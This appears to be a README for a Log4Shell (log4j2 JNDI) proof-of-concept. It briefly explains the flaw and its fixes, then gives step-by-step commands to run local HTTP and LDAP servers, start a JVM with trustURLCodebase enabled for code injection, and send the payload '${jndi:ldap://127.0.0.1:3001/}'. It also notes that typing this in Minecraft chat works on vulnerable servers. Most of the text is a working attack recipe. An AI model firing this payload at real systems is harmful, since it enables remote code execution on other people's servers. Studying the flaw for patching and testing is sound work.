This fundamental vulnerability was reported by CVE-2018-3149 and patched by this article. (8u121 Release Notes)
However, the logging library for java called log4j2 had JNDILookup, which allowed access to protocols such as LDAP, which allowed code injection in older java versions.
Patched versions of java can prevent code injection, but JNDILookup makes request to ldap server, which can lead to IP leaks.
The solution is to update Java and log4j2 versions, or to prevent the logger from writing text starting with .${jndi: (Not Recommended)
- Install requirements
cd http-server && npm install
cd ldap-server && npm install
- run
http-serverandldap-serverboth
cd http-server && node index.js
cd ldap-server && node index.js
- Start jvm with parameters
# com.sun.jndi.ldap.object.trustURLCodebase=true required for code injection, otherwise it will only request to ldap server.
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar [yourJar].jar- Send
${jndi:ldap://127.0.0.1:3001/}to any payloads. (In minecraft, just chatting this will work if exploits are working.)
CC0